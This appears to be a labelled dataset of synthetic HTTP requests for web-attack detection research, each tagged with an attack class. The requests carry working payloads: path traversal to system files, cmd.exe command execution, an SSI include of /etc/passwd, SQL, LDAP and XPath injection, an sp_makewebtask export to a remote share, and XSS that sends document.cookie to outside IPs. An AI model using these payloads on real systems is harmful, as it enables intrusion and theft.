UA-Color: color16
UA-Pixels: 6094x1402
Via: 7.7 237.36.179.22
Transfer-Encoding: YnsE; kfneshlm=teitoEO
Upgrade: hdoAgi/1.2, icsn/0.8, don/0.5
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 13247958
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49708
Start - Id: 45903
class: PathTransversal
GET /tPNllpfY7teWZgz8/anNanrganer/boot.iniXQvc@4aQ%uB-H/ry/aknweoyp39ae/8v..Pllywhere0/ere2s5twnw6enzehnZE/telnetLtmp./maN0ToNltnsrdbaaaY/wHo5btSti3S2L2nWd8iS/uT4Ot_5MGF8RB0Clz.bin?7b3@-tperl=..%2F..%2F..%2FWINNT%2Fautoexec.bat&aqOtnete=euhavingdu%2Btael4httpsmocha&scb=eI.jQe7IXsru&plvyucneeddbnt=w13u3.&ut5heoAgMDfr=t7tmpnc+oJs&oi=bOeclh%7Evheye&te=yalinkmteOe+whereey&zhnbnAe6h=1104&4document_1o=nhttpt3ese6%24d&atnysnna2=8am HTTP/1.0
Host: www.e7es5aan.org
Connection: tsptss7
Accept: audio/basic
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: op-ns9;q=0.9
Cache-Control: no-cache
Client-ip: 150.120.252.37
Cookie: 1al2Rbqyr=yEub;ooLal8shtph=931;Dwyatplyeu7netM=eacopy7ce0;4m62phttpiJpVBq=40880;slneetOte7ayoa8=yuJcKFK;aFtatenhlS=xzte
Cookie2: $Version="32"
Date: Fri, 17 Jun 05 11:24:28 GMT
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Mon, 15 Mar 10 01:47:59 UTC
If-Unmodified-Since: Tue, 17 Feb 04 03:08:23 CET
If-Match: *
If-None-Match: *
If-Range: "aj7FTihZincJyP."
Max-Forwards: 08
MIME-Version: 4.5
Pragma: p='aromn'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Basic ZWM4aWE6b2VyMVMyZQ==
Range: -431939,983-,0-
Referer: /emee/eoglUci/uvhen.mpg
TE: trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/5.0 (compatible; MSIE 4.6; Open BSD i386; csaas; upezlo7eo)
UA-CPU: StrongARM
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1031x814
Via: 2.7 www.Izhie.html, HTTP/7.6 www.deRe5aec.tiff
Transfer-Encoding: compress
Upgrade: 9sy/9.0, apeda/8.6, mmS3/2.1
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 205.145.84.10
X-Serial-Number: 447963296121692
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45903
Start - Id: 36399
class: OsCommanding
POST /glS2/wstuik4tte6mUtTta/tbr/9MOcz/qb@ReJOv_a7C5Xy9E/aZ_OQQUTc1EHn/neys6NseeeMnaoi/onorteaicg/osydaom/rm_2q/1vrEleisa6ttwj/FF5Y20X7_IqjQE2.jsp? HTTP/1.1
Content-Length: 249
Content-Language: lue52rsn,EeReh59,sesee9z
Content-Encoding: identity
Content-Location: http://er2e.be/uapiateO/1Ceojg/reTNehmu/elddan/e9iwOn.bin
Content-MD5: YWRjNW10bzRhNmRpY3Vubw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Oct 06 07:12:18 UTC
Last-Modified: Mon, 03 Nov 08 18:21:19 UTC
Host: 32.231.239.160:80
Connection: 8neam
Accept: application/*;q=0.1, application/postscript;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=133
Cookie2: $Version="9"
Date: Wed, 07 Jun 06 14:00:51 CET
ETag: "G.E2NEU@YKNCkhf"
Expect: 100-continue
If-Modified-Since: Mon, 05 Sep 05 15:43:24 GMT
If-Match: "Hh6PEtF.K1C-NUfURhS"
If-None-Match: *
If-Range: Mon, 26 Jun 06 01:26:36 GMT
Max-Forwards: 05
MIME-Version: 0.3
Proxy-Authorization: teg9e t2n7ead=tedeel
Authorization: nsgD h3t3hi=scbee
Range: 57553-
Referer: http://www.cxlc.net/tactdt0.php4
TE: gzip;q=0.6
User-Agent: Mozilla/1.5 (Windows; U; WinNT 7.8; nt-vr; rv:0.7.3) Gecko/46816822
Via: 4.9 111.70.108.30, Nmicoe/9.9 191.159.210.110
Transfer-Encoding: gzip
Upgrade: rRt6/6.6

rhTenv=';     EXEC     master..sp_makewebtask    "\\143.80.83.45\er43grta\fneuLp1a.jpg",    "SELECT   *    FROM INFORMATION_SCHEMA.TABLES"&2U5Kwindow.openhjhjb=opeeaboflm1o&qUF2=httpts \&ttsfpesgmlTwes=>shb&oAhouE30sesp=749

End - Id: 36399
Start - Id: 39728
class: SSI
GET /0Il/sy2rXN@lQr6C/yeun3ielEoytae/doshk/2tmpHnI3ftpCv2/uZ20cDZru.css?YkfCexec5itXGDG=ydkzoiu4ai&aeinqtDNTMhiT=%3C%21--++%23include+virtual%3D%22%2Fetc%2Fpasswd%22+--%3E&tnDee7=st+6a%29wzceno%26jlnr&ntttHslp4hrnoas=155920268 HTTP/1.0
Host: www.nfslht.fr:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: max-age=5
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="7"
Date: Thu, 24 May 07 23:39:56 UTC
ETag: "94bUe-wM@qJ1fI3O"
Expect: tonsult
From: iltkt32@r7Muj.it
If-Modified-Since: Tue, 23 Aug 05 15:39:37 UTC
If-Unmodified-Since: Mon, 24 May 04 12:13:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 379
MIME-Version: 4.8
Pragma: nh9eh=aWi
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: Digest uri=http://www.itee.fr/t7odpmuc/1nej/tEnlKe/peserlV4/9inen.swf
Range: -58,-7,-12255
Referer: http://s1pSss.cz/miIotle.jsp
TE: deflate,trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.2 (compatible; fSEqd02e; Win98; pkbsgyel; NeSn; Enda)
UA-CPU: x86
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 066x3039
Via: 1.7 www.ymcm.js
Transfer-Encoding: compress
Upgrade: asg/6.6, aeyyeD/5.2, eeae/5.5, sfi/1.0
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39728
Start - Id: 47773
class: XSS
GET /fkF3GH8GTHi/3laf8aa/NJU.css?nQlaunyainur=w5&di=ersllasO%3Eaes&9u4iXti=gM-%28location%5B&nlsceefj=yrif&ldAhljnfe=30096&DscriptY8hmqwbV=eperlet2haao95&scrqsebonUhtne=%3Cxml+++src++%3D+++%22++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F193.106.114.49%2Felal.dll%27%2Bdocument.cookie%29%3B%5D%22++++%3E&iaoss1Adr=56954104&fnzssne=tiadmins&6eK@9ZFBj=nUdge0oenemsiya&oauoS=l%40j31nIV&teehi5dieN=i6t&2o8vc2sic=eetaottcleifnde&ntqi=accept+idenMoeto8logEoha&ndnwe=g+xtermo HTTP/1.1
Host: www.ideutt.biz
Connection: srenht
Accept: */*;q=0.9
Accept-Charset: x-mac-icelandic, x-mac-chinesesimp;q=0.1
Accept-Encoding: identity, identity, gzip;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 91.90.227.252
Cookie: 2elc=dcw
Cookie2: $Version="49"
Date: Fri, 25 Aug 06 24:27:44 UTC
ETag: W/"Nxww7jHnVW6-iC@KeH"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Sun, 27 Dec 09 02:22:34 CET
If-Unmodified-Since: Thu, 13 Dec 07 07:07:06 GMT
If-Match: "58voER346VsT_GDZiHbx"
If-None-Match: *
If-Range: Wed, 22 Oct 08 02:04:11 CET
Max-Forwards: 67
MIME-Version: 3.5
Pragma: g8=h0T
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: asgu eNir55I=ndip
Range: 2672-661117
Referer: http://www.dUwk.st/7nTttke.sh
TE: chunked,deflate;q=0.4,deflate
Trailer: Transfer-Encoding
User-Agent: s1f-bNw2O http://www.urr9Nd.uk
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: 7.2 207.14.74.135:97267, 9.7 www.2NslS.htm:551, 2.4 www.tatmu.tiff
Transfer-Encoding: compress
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 631 www.kssI.html "8aanadrIs23e" "Sun, 29 Oct 06 08:10:03 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47773
Start - Id: 41795
class: SqlInjection
GET /csm9see3gbattloynih3/0tikQA5b8m/dgut9on1ttq/snc6P085K_MbS/qrW95szID9/rfzRVRx82lV4n2/aHWwIk/s49awu9nv@/0varRHsZUMVArxH.asmx?eaeoanen9IuvtlA=64240073&aHSNado=updateih8%3Cphmae&coebrd=%27+++%29+UNION+++++ALL++++SELECT+rcnn++++%2C+talmTavj++%2C+++++aevtit+FROM+ccaah+++WHERE+7d+NOT++++IN+++%28++++%27eiljnrnp%27++++%29++AND+++mA+++NOT+++IN+++++%28++++%27cyeThausy%27++++%29+++AND++%27%27%3D%27&ietalitmNN=iSerwsae HTTP/1.1
Host: 193.169.168.29
Connection: keep-alive
Accept: image/jpeg, audio/*
Accept-Charset: x-mac-icelandic, x-mac-greek, cp-950;q=0.6, iso-8859-8-i;q=0.4
Accept-Encoding: 
Accept-Language: a-s9
Cache-Control: max-stale
Client-ip: 218.44.126.244
Cookie: ensstiaav=af8NUYejY8;qroeti=onNON-I;dn=n eLioNdohe4p;zNt=giyh@G@Bvk;7hs=Smrc;
Cookie2: $Version="3"
Date: Sun, 17 Sep 06 20:20:13 GMT
ETag: W/"ZXEXElr@0LpV3YJGdbm"
Expect: onotkol
From: hwhheI@8isu.ch
If-Modified-Since: Fri, 10 Aug 07 07:03:30 CET
If-Unmodified-Since: Thu, 17 Jan 08 10:41:55 CET
If-Match: "U3HSCRJZvBuFJOs7E93"
If-None-Match: "sGXZtqxzqs6hQf4IyvhI"
If-Range: *
Max-Forwards: 167
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic c2ppZGFueHk6ckl3MWll
Authorization: Basic aW9jZTllOm5pbnlm
Range: 82059-
Referer: /62incecn/etso/isecai.jpeg
TE: gzip,trailers,deflate;q=0.4
Trailer: User-Agent
User-Agent: Mozilla/3.7 (X11; U; Unix 5.0; Hm-sa; rv:4.3.9) Gecko/92356074
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 832x0332
Via: HTTP/3.5 www.teeer.shtml, FTP/6.2 www.ucrou.js, FTP/1.1 24.6.237.44
Transfer-Encoding: hqieed
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 426 159.202.208.161 "deuobinrttskRs" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 913755
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41795
Start - Id: 37225
class: LdapInjection
GET /ls/eu7zz@1/vmldSihot/uI.bYyfKH1rz6EBPSGv/eWlsxCyYl9LE.mspx?oUt6=oidrnmbevnekoh6&ZK8GQ58UUva=%3C&iszEdhriAonml=%29%28+++%7C+%28nae%3Dzds*%29&revtn=+y&7havinghBunionbO=ahg HTTP/1.0
Host: 136.151.193.168:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.7, x-mac-arabic;q=0.6, x-mac-cyrillic
Accept-Encoding: deflate;q=0.7, deflate;q=0.7
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 207.74.17.17
Cookie: aubaeit=htdozear;BuaHt4hla0=41
Cookie2: $Version="943"
Date: Mon, 16 May 05 22:50:17 UTC
ETag: "czNQPVvyxU6hhOg3"
Expect: eesgne
From: soETt@snjTsesiy.ch
If-Modified-Since: Sun, 04 Dec 05 05:15:31 CET
If-Unmodified-Since: Sun, 28 Sep 08 23:39:31 CET
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: *
If-Range: Thu, 25 Nov 04 14:47:14 GMT
Max-Forwards: 8900
MIME-Version: 2.4
Pragma: 6o7nnrfa='4rw1c1'
Proxy-Authorization: Digest realm
Authorization: Basic ZUFyYzpod2Q4b3loYw==
Range: -035
Referer: /oyn5ehgo.php3
TE: deflate;q=0.0,trailers
Trailer: Max-Forwards
User-Agent: 1zvJonnn (sQuwj0rk)
UA-CPU: x86
UA-Disp: 5765,446,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 8.1 www.osniapu.css, nnpfg/8.0 213.147.44.108
Transfer-Encoding: gzip
Upgrade: TrRiy/4.3, rsibt/9.4
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 496450931195263351
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37225
Start - Id: 46908
class: XSS
PUT /tsiv2ueyDT8eVKJ05dj.dll? HTTP/1.1
Content-Length: 145
Content-Language: sTris,hs1,haoyoo
Content-Encoding: identity
Content-Location: /r9T5s/bfem2/thtnirei/aoot.png
Content-MD5: dG9oR2VsbGlvbmFiaGxscg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sat, 17 Jan 09 07:59:21 CET
Host: www.enxdirsi.be
Connection: cktlytc
Accept: text/xml, video/*, image/png
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, identity;q=0.4, deflate, deflate;q=0.0
Accept-Language: fnhanIg-mcevodth;q=0.1, udrael-8sna6;q=0.3, a2h0e3-2re
Cache-Control: min-fresh=203
Client-ip: 44.189.197.231
Cookie: glumbe=3764;ivateeJ=ros8iawe mh1s;nd=nartnautoexecsaaautoexeccsf;pounoe2h=cbc@eallhrysexec1t[ 
Cookie2: $Version="1"
Date: Thu, 11 Mar 04 23:22:22 CET
ETag: W/"utOApzZbAhT5WSy.P0"
Expect: E2exe=EsamTnl
From: upcvs@2st5aswaw.ch
If-Modified-Since: Tue, 23 Jan 07 04:24:31 CET
If-Unmodified-Since: Thu, 08 Apr 04 15:43:44 GMT
If-Match: *
If-None-Match: "4ntYqkjENfVbwWTtt"
If-Range: "HZ_8apbmB3tOsH-"
Max-Forwards: 5
MIME-Version: 9.1
Pragma: autu=r
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: Digest opaque="ntdla"
Range: -790
Referer: /solLit/cOocT/onntyr5n/rd0uro/e5e3ae.html
TE: trailers
Trailer: Expect
User-Agent: cijk7ot/4.7.7.1
UA-CPU: MIPS
UA-Disp: 164,960,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8473x700
Via: 3.4 www.asiZl.jpeg:817, 4.3 www.96Se0b.jpg
Transfer-Encoding: deflate
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

gFsoHet=e1gl&nkrucacma=&<script   >[alert ('zh5taeSiow');]</script>&srsEt=tstg&JUG0KUD9=eg&raAiduespotdIen=g1z2oruooa9n

End - Id: 46908
Start - Id: 42607
class: SqlInjection
GET /rqtsbtoE/tnpssehnytLd/iMjtLv2s/VtYz@x5eR4Dj3du/NTC4djz.html?GSzU6aV-FMty=haIgO5pHrtLh&sgUjAeat=2033792&n53hsTe8feiupEs=rmitIc8genG&gtttArecs8=OR+++++%27daW1em%27++LIKE+%27Sim%25%27&yfgos=a%40 HTTP/1.1
Host: www.iXssamsolc.fr:80
Connection: close
Accept: video/quicktime;q=0.4, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 30.185.17.82
Cookie: wt29fi6mOt9leel=tYlVR;xasnx=7
Cookie2: $Version="641"
Date: Fri, 23 May 08 17:07:00 CET
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: r9g3sbl=nvita
From: Ttm5ttN@Sin1.net
If-Modified-Since: Tue, 23 Mar 04 21:40:43 UTC
If-Unmodified-Since: Sat, 20 Oct 07 17:09:50 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Jun 04 03:46:25 UTC
Max-Forwards: 29
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: 4aok rulime4l=umecavz
Referer: http://etusa.uk/sn9hji/ixhyd74r/heaeo5or/7neqly.js
TE: gzip;q=0.0,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/9.6 (X11; U; Unix 0.9; na-st; rv:2.8.3) Gecko/36043220
UA-CPU: PowerPC
UA-Disp: 4133,8176,16
UA-OS: Win95
UA-Pixels: 4720x346
Via: 6.9 www.u3liee.gif, 4.1 www.y9nshn3A.jpg
Transfer-Encoding: identity
Upgrade: utiuG/5.0
Warning: 966 www.behrc.jpeg "tmzezat" "Sat, 08 Apr 06 03:40:35 CET"
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42607
Start - Id: 44166
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 190.173.196.72
Connection: keep-alive
Accept: image/gif;q=0.9, image/gif;q=0.2, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 6oaphm-b6ne;q=0.2, ncs-EynXex;q=0.1, i-v;q=0.2
Cache-Control: min-fresh=178
Client-ip: 21.12.224.178
Cookie: dafn40oacsNpggH=tetcexecayttf]dwautoexecoc %e;R3cd1HoLepe=tNtShn;A9necwknetrn=mvar
Cookie2: $Version="13"
Date: Thu, 18 Feb 10 11:11:19 UTC
ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: uZat4lfl=YdgRc;nrwdee
From: ejtot@nhhlptpni.net
If-Modified-Since: Wed, 17 Mar 10 19:34:04 CET
If-Unmodified-Since: Wed, 16 Dec 09 17:22:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 78
MIME-Version: 3.5
Pragma: aoetD4=bs
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Basic ZXhub2xhaDp0clVzOWU3
Range: 13627-239
Referer: http://ti0rnxl.fr/ete4qz7q.cgi
TE: trailers,deflate;q=0.2,chunked;q=0.0
Trailer: Cache-Control
User-Agent: nyJKisU http://www.gweceesa.cz
UA-CPU: 68000
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 884x0554
Via: 1.7 12.63.111.109, 8.8 www.tdsO.htm
Transfer-Encoding: gzip
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 46.6.55.36
X-Serial-Number: 50318927121848032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44166
Start - Id: 39123
class: LdapInjection
PUT /at/sU/RhPsn5trnoxupr/eeEeilaptgQfeto2wrba/oVa3.RY/oY5IFAJGzSBt8/eHLfrRwtoetamhe/rQ5pp3dm_pUXI_bJk0.jpg? HTTP/1.1
Content-Length: 213
Content-Language: Rehek,v9sEd
Content-Encoding: deflate
Content-Location: http://www.OndnA.fr/T1enUtn/mzethae/peeo/ne4wsehe/5lnd.asp
Content-MD5: MU5ldDhuM2VhdWlodG5jYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Jul 09 03:56:23 CET
Last-Modified: Thu, 31 Aug 06 09:08:59 GMT
Host: 46.74.11.137
Connection: falnh
Accept: image/gif;q=0.4
Accept-Charset: windows-1258;q=0.0, utf-8
Accept-Encoding: identity;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 88.144.223.102
Cookie: 6lin4nhte4oht=sW.7S;U8pUpGPscriptg=re3;aadae=9972;ho2rsza=")(targetfilter=(o=NetscapeRoot))
Date: Fri, 03 Jun 05 17:22:24 CET
ETag: "ur.m09mSvzgst0S@I.K"
Expect: h3ea=sobziec5
From: esrowUn@H4eeAThi.net
If-Unmodified-Since: Fri, 14 Oct 05 24:00:06 GMT
If-Match: *
If-None-Match: "HHCmsJFcPAHIJgTCT"
If-Range: Sat, 27 Mar 04 06:55:57 GMT
Max-Forwards: 9
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: i7tdm traeint=ncrlar
Authorization: Basic b2lzcXltUHQ6c2FPbA==
Range: 513-,71-
Referer: /adaoam/omerhe5/opnknx/pxee/eestuqs.css
TE: chunked;q=0.4,trailers
User-Agent: ac3AcXyD http://www.sqlmq.uk
UA-Pixels: 6666x3382
Transfer-Encoding: compress
Upgrade: utraU/8.6, 07oswn/3.9, thkodf/2.0, 1lpi/5.9
X-Forwarded-For: 172.141.49.245
X-Serial-Number: 3871696

Rro16eutseurahe=7342639641&eeosq=62&o9Xetceqm=9sgrierdF&eosodcwtoi=dnMUcseelktrw&eQexjaCNulh7btn=t8meuouy3&ejtzyLonHaelaj=8426002&hnoHp=09067155&dtfkswnrdallEty=48&iet3lbtshfnah=orausock_streamraetcrdda&szorcmn=hr

End - Id: 39123
Start - Id: 44155
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: www.Qiath.cz:7823
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: myj66-evut
Cache-Control: no-store
Client-ip: 5.92.107.40
Cookie: 6lbe4=scopy telnetqg(
Cookie2: $Version="971"
Date: Sun, 22 Jan 06 07:32:09 UTC
ETag: W/"MsiFE@faBgslkNVRQxH"
Expect: wzoajpob=ltbiem;tOrhtt7
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sun, 11 Apr 04 11:03:47 UTC
If-Unmodified-Since: Thu, 04 Mar 04 10:05:26 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 880
MIME-Version: 7.5
Pragma: l2='nndRc'
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Digest realm
Range: 815-,644-20793
Referer: /stdnE3k/hexvw.mpg
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/4.4 (X11; U; Linux i386 8.4; nc-st; rv:5.0.7) Gecko/65193354
UA-CPU: Sparc
UA-Disp: 7825,945,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: 8.1 186.131.16.222:13, FTP/2.1 166.88.243.107
Transfer-Encoding: lutzr3; Oyfitig9=4ToMper3
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 315 250.26.253.55 "aaeakdwosbfa" "Wed, 07 Apr 10 16:10:50 GMT"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44155
Start - Id: 45233
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: www.m5oneK.net
Connection: Tna0
Accept: image/*;q=0.1, text/plain, text/xml
Accept-Charset: isiri-3342;q=0.8, koi8;q=0.4, iso-8859-8;q=0.7, windows-1255, windows-1255;q=0.7
Accept-Encoding: gzip;q=0.1, gzip, compress, deflate, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 83.132.12.183
Cookie: terenipomAenlsa=343231;inputBKpvF4f=qat;uYRDNxgroup byQq_=licphe c;txdaf=232
Cookie2: $Version="8"
Date: Wed, 25 May 05 18:54:56 GMT
ETag: W/"t2Ytcd_RbO7gw0dHf"
Expect: Ieam=7yoy
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Mon, 11 Apr 05 08:07:35 GMT
If-Unmodified-Since: Mon, 19 Jun 06 05:19:46 CET
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: *
Max-Forwards: 17
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM eUlsY0V0aHdZbndYRXVuVGc0c3RwODZub29TNE5uZW5ubnR0c3NjYWZjcnJ1TWQ=
Range: 220-5761,42620-
Referer: /ertoe/5uNnehc/rnnk/nioi.jsp
TE: trailers
Trailer: Expect
User-Agent: Mozilla/2.4 (Machintosh; U; PPC Mac OS X 5.3; Nd-oO; rv:4.1.1) Gecko/03272921
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/3.9 www.ee60tcs.shtml
Transfer-Encoding: identity
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45233
Start - Id: 48006
class: XSS
GET /naGafstotnl24mtdg/v.fa/okV/e_Cn-/Likceaet1c/prduM/xconwtezaDmkgk/au8thWePHs9ntntzwe3.tiff?Ams7AW=saatUiIoIro9xlrec&n8UWtT=%3Biiol&aoytLtmY6ssA=%3Cxml+id++++%3D+%22+++X+%22%3E%3Ca%3E%3Cb+%3E%26lt%3Bscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F115.205.235.145%2Filtoas.bin%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb+++%3E%3C%2Fa+++%3E%3C%2Fxml%3E HTTP/1.0
Host: 229.186.218.118
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="40"
Date: Sat, 01 May 10 09:55:23 UTC
ETag: "wpRitPdByMlsrTEbXjXz"
Expect: btagiam=frsp
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Tue, 29 Jun 04 08:20:43 UTC
If-Unmodified-Since: Sun, 13 Jan 08 16:06:53 UTC
If-Match: "NPta-cuyFxM0kmidF"
If-None-Match: *
If-Range: Fri, 09 Sep 05 15:32:16 UTC
Max-Forwards: 212
MIME-Version: 8.3
Pragma: n8rue5e=rkie
Proxy-Authorization: NTLM NnJhc2lkbGhldzBvZWFkcDRlYW5zdWVuaWF0c0xuaGdnZXBob28=
Authorization: Digest algorithm=sinirvd
Range: 545-32,248-,104203-4203
Referer: http://O7msn.it/urarhhun/z3rs.php4
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.8 (Windows; U; Win 9x 3.3; uE-et; rv:6.7.0) Gecko/01588811
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 948x768
Via: 4.1 www.tHyoonno.shtml:128, 0.9 www.stTtfns.shtml
Transfer-Encoding: compress
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 719 192.135.212.235 "aydoiKoirtnniwyEt6no" "Wed, 31 Dec 08 13:01:26 GMT"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48006
Start - Id: 48979
class: XPathInjection
GET /eSV_F5u-/mxt2oohs.asp?BJ0fKIRhome=ctds7t%3Cgioaanea%40&execa0i5accept=window.openid%5DeE0logRi&essh=hs23rtelisttHdm&cnoatInShwh=4300&seestlteam=UOlreds8oysdcu&fc=4&9NrtofehdtbsrIl=lwnmgs&OxyBdg8tvemochagroup by=77050&eMsmr8h=dl.hB45&ttb0endl=ssrnieduengi%3Cb&Elznda2msiihfzM=ents&nknuuuo4=6+++or+++3%2Fespm%2Fmjceot%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D856%5D++++or+8%3D&8mrnsevOloesn=7R5ani&rnngeisuri=idA4hgroup+byaQt+e HTTP/1.1
Host: www.i9gls.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: i-0zetsOy;q=0.6, ys7-htiecre;q=0.2, gtpealdu-iDtoPs
Cache-Control: max-age=5
Client-ip: 164.70.50.145
